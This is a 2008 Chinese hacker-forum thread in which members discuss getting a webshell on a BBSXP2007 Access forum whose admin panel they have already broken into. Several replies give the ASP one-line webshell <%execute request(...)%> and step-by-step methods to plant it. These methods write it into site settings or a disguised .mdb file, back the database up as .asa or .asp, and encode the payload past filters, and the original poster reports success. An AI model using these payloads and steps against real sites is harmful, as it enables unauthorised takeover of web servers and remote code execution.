【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [讨论]BBSXP2007 Access版后台拿shell问题 [打印本页]

作者: valen886 时间: 2008-7-23 08:27 标题: [讨论]BBSXP2007 Access版后台拿shell问题

[讨论]BBSXP2007 Access版后台拿shell问题
议题作者：Awolf
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

  在测试一个BBSXP2007access版的漏洞，成功的得到了一个后台密码并进入后台。

  让人悲哀的是，后台没有办法开启上传功能，那么修改后台上传后缀直接传马的方法不行了，还有下载数据库插入小马然后备份的方法也走不通了。那么我们有什么方法从后台拿到shell？
  请问出了我上述两种方法外还有什么方法可以拿下shell?谢谢
帖子14 精华0 积分51 阅读权限40 在线时间19 小时注册时间2007-12-3 最后登录2008-7-22 查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经

十三豆子

晶莹剔透§烈日灼然

作者: 轻舞飞扬 时间: 2008-7-23 08:27

BBSXP后台有一个广告还是页面设置的地方,可以插一句话进数据库,然后备份数据库为ASA就可以了.我是十三豆子,不是十三颗豆子.bbs.tian6.com

帖子38 精华0 积分90 阅读权限40 性别男在线时间144 小时注册时间2005-4-19 最后登录2008-7-21 查看详细资料TOP 少女暴富的隐秘（图）

゛小︷帅！﹊

晶莹剔透§烈日灼然

作者: bbbbf 时间: 2008-7-23 08:27

表Admin

列username password .........
<%execute request("#")%>

上传恢复一下数据库。

再备份。

ok/你拿到shell了`

帖子58 精华0 积分155 阅读权限40 来自杭州在线时间152 小时注册时间2007-9-29 最后登录2008-7-16 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味

awolf

晶莹剔透§烈日灼然

作者: sunnygirl 时间: 2008-7-23 08:27

引用:
引用第1楼十三豆子于2008-01-05 11:26发表的 :
BBSXP后台有一个广告还是页面设置的地方,可以插一句话进数据库,然后备份数据库为ASA就可以了.
恩，你说的地方我测试过了，我在“管理所有角色”的地方插入一句话，但是到数据库中被过滤得不成样子了，连接一句话出现乱码，没有想看到的那句！

不知道这位大哥说的是不是这个地方，还有如果是这个地方有办法绕过验证？小弟学浅，想了N久也不知道。。。。貌似过滤成这样无法绕过。
帖子14 精华0 积分51 阅读权限40 在线时间19 小时注册时间2007-12-3 最后登录2008-7-22 查看详细资料TOP

awolf

晶莹剔透§烈日灼然

作者: sherwood5 时间: 2008-7-23 08:27

引用:
引用第2楼゛小︷帅！﹊于2008-01-05 11:45发表的 :
表Admin

列username password .........
<%execute request("#")%>

.......
可以具体点不？前提是无法开通上传组建的！
帖子14 精华0 积分51 阅读权限40 在线时间19 小时注册时间2007-12-3 最后登录2008-7-22 查看详细资料TOP 软件项目外包

゛小︷帅！﹊

晶莹剔透§烈日灼然

作者: 周星星 时间: 2008-7-23 08:27

申明下，我没测试过。但是在其他的地方运用到过类似的方法

你可以参考下《自力更生搞定my动力系统》

1、先帮网站备份当前数据库。 ' 比如为bak.mdb

2、去down一份数据库。版本要一样

3、去掉nodown表`去掉全部的表。只留一个“admin”

4、在admin表里加一个<%execute request("fucker")%>

5、然后上传上去，当然是图片了。。

6、恢复数据库，我说的恢复不是恢复步骤1的数据库，而是步骤5的图片。

7、有的人会说网站会倒塌，应该不会，所以我说我没实践。但是我觉得这个办法是通杀的。

8、再一次备份当前数据库。 ' 比如为“asp.asp/test.mdb”，或者“asp.asa”

这个是理论上的思路……

引用:
Quote:
引用第2楼゛小︷帅！﹊于2008-01-05 11:45发表的 :
表Admin

列username password .........
<%execute request("#")%>

.......

可以具体点不？前提是无法开通上传组建的！
那我就无能为力了。

全部都试一下吧。

把一句话加密什么的。

帖子58 精华0 积分155 阅读权限40 来自杭州在线时间152 小时注册时间2007-9-29 最后登录2008-7-16 查看个人网站
查看详细资料TOP 少女暴富的隐秘（图）

simpleboy

晶莹剔透§烈日灼然

作者: 大圣 时间: 2008-7-23 08:28

引用:
引用第5楼゛小︷帅！﹊于2008-01-06 10:32发表的 :
申明下，我没测试过。但是在其他的地方运用到过类似的方法

你可以参考下《自力更生搞定my动力系统》

1、先帮网站备份当前数据库。 ' 比如为bak.mdb
.......
小弟对哪SHELL 不了解这里看到了好奇
第4步和第5步是什么意思呢？

是上传图片还是备份的数据库
还是先上传数据库然后再上传图片木马？？

好像都不对吧求知勿见笑只做安静的观众
帖子72 精华2 积分224 阅读权限40 在线时间42 小时注册时间2006-10-23 最后登录2008-7-2 查看详细资料TOP 让女孩一夜变的更有女人味

゛小︷帅！﹊

晶莹剔透§烈日灼然

作者: kinsaang 时间: 2008-7-23 08:28

引用:
引用第6楼simpleboy于2008-01-06 15:26发表的 :

小弟对哪SHELL 不了解这里看到了好奇
第4步和第5步是什么意思呢？

.......
难道我说模糊了？

先把一句话插到自己设置的数据库（.mdb）接着换扩展名（.jpg）上传

恢复（.jpg）。

没测试过。但是大部分的站点都能这样拿到shell。

可惜了。楼主要的webshell不支持上传
复制内容到剪贴板
代码:
Request 对象错误 'ASP 0104 : 80004005'

不允许操作

/Utility/UpFile_Class.asp，行 36
原来是用2进制读了。

看来我的办法是不行的

帖子58 精华0 积分155 阅读权限40 来自杭州在线时间152 小时注册时间2007-9-29 最后登录2008-7-16 查看个人网站
查看详细资料TOP

awolf

晶莹剔透§烈日灼然

作者: bmwyun 时间: 2008-7-23 08:28

我又重新读了代码，还是没有找到可以利用的地方，除了可开启上传功能。
可是小弟学识有限，各位大大还有什么好方法？恩，゛小︷帅！大哥的说得没错，基本上都可以通过上传来拿到shell，但是我就遇到一个BT不能上传的。看看能不能突破~~
期待ing
帖子14 精华0 积分51 阅读权限40 在线时间19 小时注册时间2007-12-3 最后登录2008-7-22 查看详细资料TOP

awolf

晶莹剔透§烈日灼然

作者: 马自达 时间: 2008-7-23 08:28

测试发现：在网站配置中写入一句话木马.然后备份就可以了。。。
终于成功解决了
帖子14 精华0 积分51 阅读权限40 在线时间19 小时注册时间2007-12-3 最后登录2008-7-22 查看详细资料TOP

anki

晶莹剔透§烈日灼然

作者: 东莞军人 时间: 2008-7-23 08:28

上传设置里添加MDB类型文件，把含有一句话木马的MDB文件备份一下就可以了。
帖子34 精华0 积分129 阅读权限40 性别男在线时间12 小时注册时间2007-1-25 最后登录2008-5-21 查看详细资料TOP

awolf

晶莹剔透§烈日灼然

作者: hycmx 时间: 2008-7-23 08:28

引用:
引用第10楼anki于2008-01-11 10:09发表的 :
上传设置里添加MDB类型文件，把含有一句话木马的MDB文件备份一下就可以了。
楼上的看清楚了
前提是不能开通上传的
还是感谢
帖子14 精华0 积分51 阅读权限40 在线时间19 小时注册时间2007-12-3 最后登录2008-7-22 查看详细资料TOP

anki

晶莹剔透§烈日灼然

作者: 骆宗平 时间: 2008-7-23 08:28

抱歉，是我没有看清楚，那为什么不能开启啊，不支持上传吗？？你自己已经解决了哦。。
帖子34 精华0 积分129 阅读权限40 性别男在线时间12 小时注册时间2007-1-25 最后登录2008-5-21 查看详细资料TOP

杀虫剂

晶莹剔透§烈日灼然

作者: 强劲力量 时间: 2008-7-23 08:28

也遇见了个BBSXP2007和楼主的一样。。。
上传组件无法开通不能上传文件，所以上传个一句话的图片数据库是行不通的。。
——————————————————
在网站配置中写入一句话木马.然后备份就可以了。。。
是不是进后台在基本设置——普通配置——站点名称等这些地方写入一句话？？

在我写入到这些地方的时候发现语句过滤掉了，<%execute request("value")%>变成了<%execute request( " />在网上找了个转换工具把<%execute request("value")%^>转化成┼硥捥瑵?敲畱獥?瘢污敵?帥>u 备份数据库打开发现
Active Server Pages 错误 'ASP 0116'

丢失脚本关闭分隔符

/bbs2/database/3.asp，行 47550

Script 块缺少脚本关闭标记(%>)。

是不是那里出现问题了，还是一句话出现错误了，应该怎么解决？黎叔很生气

帖子70 精华0 积分161 阅读权限40 性别男在线时间84 小时注册时间2006-4-27 最后登录2008-7-18 查看详细资料TOP

yzy888

晶莹剔透§烈日灼然

作者: 86981935 时间: 2008-7-23 08:28

引用:
引用第13楼杀虫剂于2008-01-12 23:51发表的 :
也遇见了个BBSXP2007和楼主的一样。。。
上传组件无法开通不能上传文件，所以上传个一句话的图片数据库是行不通的。。
——————————————————
在网站配置中写入一句话木马.然后备份就可以了。。。
是不是进后台在基本设置——普通配置——站点名称等这些地方写入一句话？？
.......
你这应该是加入了防下载表了吧, 如果后台有执行SQL语句的功能,UPDATE一下就行了,一会去下一个BBSXP来试试看,
帖子21 精华0 积分71 阅读权限40 在线时间44 小时注册时间2007-1-10 最后登录2008-7-21 查看详细资料TOP

awolf

晶莹剔透§烈日灼然

作者: 珉头 时间: 2008-7-23 08:28

引用:
引用第13楼杀虫剂于2008-01-12 23:51发表的 :
也遇见了个BBSXP2007和楼主的一样。。。
上传组件无法开通不能上传文件，所以上传个一句话的图片数据库是行不通的。。
——————————————————
在网站配置中写入一句话木马.然后备份就可以了。。。
是不是进后台在基本设置——普通配置——站点名称等这些地方写入一句话？？
.......
大哥的一句话是用什么转换呢？要用lake2的一个ascii2unicode的工具?感觉是你转换错误才会出现这种错误，你看下到数据库后被转成什么样子了就知道了
帖子14 精华0 积分51 阅读权限40 在线时间19 小时注册时间2007-12-3 最后登录2008-7-22 查看详细资料TOP

杀虫剂

晶莹剔透§烈日灼然

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)